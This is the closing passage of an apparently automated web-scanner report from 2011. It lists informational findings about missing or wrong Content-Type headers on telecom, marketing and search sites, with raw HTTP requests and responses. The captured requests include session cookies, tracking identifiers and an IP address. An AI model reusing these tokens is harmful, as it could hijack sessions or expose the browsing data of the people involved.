Cookie: BIGipServernas-ns=2869930176.20480.0000; __utmz=173095996.1305158722.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173095996.420345061.1305158722.1305158722.1305158722.1; __utmc=173095996; __utmb=173095996.1.10.1305158722

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:34 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 8089

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

26.5. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Request

Response

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1481&ref2=elqNone&tzo=360&ms=427 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK; __utmz=16459234.1305052641.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=6599123931014412246; __utma=16459234.2120725548.1305052641.1305052641.1305052641.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Thu, 12 May 2011 00:46:52 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

26.7. http://shop2.sprint.com/en/support/faq/wlnp.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/en/support/faq/wlnp.shtml

Request

Response

26.8. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dslreports.com
Path:	/forum/r25728643-Nettalk-number-portability-

Request

Response

26.9. http://www.nationalnanpa.com/contact_us/index.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/contact_us/index.cgi

Request

Response

26.10. http://www.nationalnanpa.com/contact_us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/contact_us/index.html

Request

Response

26.11. http://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Request

Response

26.12. http://www.nationalnanpa.com/number_resource_info/area_code_maps.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/number_resource_info/area_code_maps.html

Request

GET /number_resource_info/area_code_maps.html HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/contact_us/index.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.1.10.1305158784

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:26 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 6339

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

26.13. https://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Request

Response

27. Content type incorrectly stated previous next
There are 22 instances of this issue:

http://anpisolutions.app4.hubspot.com/salog.js.aspx
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://mobilitypoint.westcon.com/favicon.ico
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://shop2.sprint.com/favicon.ico
https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif
https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif
http://support.sprint.com/favicon.ico
http://www.anpisolutions.com/wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js
http://www.anpisolutions.com/wp-content/uploads/favicon.ico
http://www.etalkup.com/formjsforoneutf8.aspx
http://www.etalkup.com/getpanelsdk.aspx
http://www.etalkup.com:8089/webclient/pagetrace
http://www.facebook.com/extern/login_status.php
http://www.google.com/mbd
http://www.google.com/search
http://www.linkedin.com/companyInsider
http://www.nanpa.org/forums/external.php
http://www.nationalnanpa.com/nas/public/assigned_code_query_step2.do
http://www.nationalnanpa.com/nas/public/js/utilities.js
https://www.nationalnanpa.com/nas/public/js/utilities.js
http://www.stumbleupon.com/hostedbadge.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://anpisolutions.app4.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://anpisolutions.app4.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.2. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

27.3. http://mobilitypoint.westcon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mobilitypoint.westcon.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: mobilitypoint.westcon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:54 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Wed, 12 May 2010 23:07:11 GMT
ETag: "64005-37e-4866db3af25c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .....................................................................................p.....0..@..0.....`.............................................`...............
...[SNIP]...

27.4. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

27.5. http://shop2.sprint.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://shop2.sprint.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:01 GMT
Content-type: text/plain
Last-modified: Wed, 31 Oct 2007 13:38:57 GMT
Content-length: 1150
Etag: "47e-47288571"
Accept-ranges: bytes

............ .h.......(....... ..... .........................................................................................................ttt.......................................................
...[SNIP]...

27.6. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/911_logo_trc.jpg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

Response

27.7. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/Custom_HeadLogo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

Response

27.8. http://support.sprint.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.sprint.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; Apache=173.193.214.243.1305161163858079; JSESSIONID=D3F28334505BBC9E51E1664A0A1C88ED.support1; RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint; s_sq=%5B%5BB%5D%5D; s_sv_sid=291574083652; s_sv_112_p1=1@10@s/5755&e/2; s_sv_112_s1=1@16@a//1305161183914; s_vi=[CS]v1|26E596EF85013CD0-6000010E60307DC6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:35 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 Apr 2010 11:54:19 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... .........................................................................................................ttt.......................................................
...[SNIP]...

27.9. http://www.anpisolutions.com/wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.anpisolutions.com
Path:	/wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js?ver=1.3.72 HTTP/1.1
Host: www.anpisolutions.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Last-Modified: Tue, 29 Mar 2011 23:28:04 GMT
Accept-Ranges: bytes
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: application/x-javascript
Content-Length: 12738

/**
* SlideDeck 1.2.2 Pro - 2011-03-22
* Copyright (c) 2011 digital-telepathy (http://www.dtelepathy.com)
*
* BY USING THIS SOFTWARE, YOU AGREE TO THE TERMS OF THE SLIDEDECK
* LICENSE AGRE
...[SNIP]...

27.10. http://www.anpisolutions.com/wp-content/uploads/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.anpisolutions.com
Path:	/wp-content/uploads/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/uploads/favicon.ico HTTP/1.1
Host: www.anpisolutions.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=128725084.1305161182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=128725084.2037716663.1305161182.1305161182.1305161182.1; __utmc=128725084; __utmb=128725084.1.10.1305161182

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 07 Mar 2011 23:41:30 GMT
Accept-Ranges: bytes
Content-Length: 15086
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/plain

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................2...1E..2\..1...2...1...1...0...
...[SNIP]...

27.11. http://www.etalkup.com/formjsforoneutf8.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.etalkup.com
Path:	/formjsforoneutf8.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b4yuajzseojnxtq3idh1rynt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 482

var kilo_boat_logo="";
var imgChange="";
var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
if(typeof(panelSDK)=="undefined")
{
document.write(
...[SNIP]...

27.12. http://www.etalkup.com/getpanelsdk.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.etalkup.com
Path:	/getpanelsdk.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.com HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=pa4hprvrpnb4lnibphzigs45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8366

var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
var kiloboaturl=gaJsProtocol+"www.etalkup.com/images/";
var kilo_boat_globalUrl=gaJsProtocol+"www.etalk
...[SNIP]...

27.13. http://www.etalkup.com:8089/webclient/pagetrace previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.etalkup.com:8089
Path:	/webclient/pagetrace

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /webclient/pagetrace?cid=911078775:redsky_wg@workgroup.etalkup.com&url=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&keyword=none&title=E911%20Products%20%3A%3A%20RedSky%20%3A%3A%20The%20Leader%20in%20E911%20Solutions&reffer=http://www.redskye911.com/&type=enter&color=16&resolution=2304000&language=undefined&zh=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64%3B%20rv%3A2.0.1)%20Gecko%2F20100101%20Firefox%2F4.0.1&explorer=%2520WOW64&os=%2520rv%253A2.0.1)%2520Gecko%252F20100101%2520Firefox%252F4.0.1&pageid=596423780&date=Wed%20May%2011%202011%2020:07:17%20GMT-0500%20(Central%20Daylight%20Time) HTTP/1.1
Host: www.etalkup.com:8089
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: ASP.NET_SessionId=pa4hprvrpnb4lnibphzigs45

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 01:07:08 GMT
Content-Length: 4

OK

27.14. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

27.15. http://www.google.com/mbd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/mbd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=lnp+login&hl=en&biw=1065&bih=964&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=15163754553264110481&usg=fb02&zx=1305161091174 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:51 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 7486

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...

27.16. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=DAVIX HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 16115

ShjDd-Or....S....L.....y.........Os#..DAVIX.7%..kYC7LTaHqM4fn0QGe873-Bw",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,29822,30035,30107,30152,30275",kCSI:{e:"17259,24472,25
...[SNIP]...

27.17. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.18. http://www.nanpa.org/forums/external.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.19. http://www.nationalnanpa.com/nas/public/assigned_code_query_step2.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_step2.do

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /nas/public/assigned_code_query_step2.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:14:35 GMT
Server: Apache
Content-Length: 53
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8

Invalid path /assigned_code_query_step2 was requested

27.20. http://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.21. https://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.22. http://www.stumbleupon.com/hostedbadge.php previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stumbleupon.com
Path:	/hostedbadge.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28. Content type is not specified previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/images/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

Report generated by XSS.CX at Thu May 12 05:49:33 CDT 2011.